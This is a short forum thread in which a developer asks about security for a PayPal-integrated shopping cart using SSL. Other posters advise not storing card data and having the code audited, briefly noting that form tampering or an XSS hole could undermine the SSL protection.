Accepting Credit Card Payments

[sh0wtym3]

Hey all,

 

I'm setting up a shopping cart for a website, and I've installed an SSL certificate so the credit card information will be taken on a secure encrypted https connection. So far everything is working fine. The shopping cart will be communicating with a paypal API.

 

This is my first time building an eCommerce website, and I wanted to know if there's any security precautions I should be aware of? Am I good to go with just a secure connection?

 

I'm also redirecting all http requests to https on the checkout page through the .htaccess file, to make sure no user accidentally ends up filling out their credit card information on an unsecure connection.

[scootstah]

As long as you're using something like PayPal to process the cards, you should be okay. But, don't store any card information on your own servers. If you have to ask, you don't have the experience to do that safely.

[sh0wtym3]

Ok thanks. And I won't, I'll only be storing non-cc info in the database (name, address, phone, email)

[xyph]

Get a security professional, or a couple good eyes to audit your code.

 

If someone gets in and modifies the action of your form, or finds an XSS hole to do the same, your SSL cert won't help.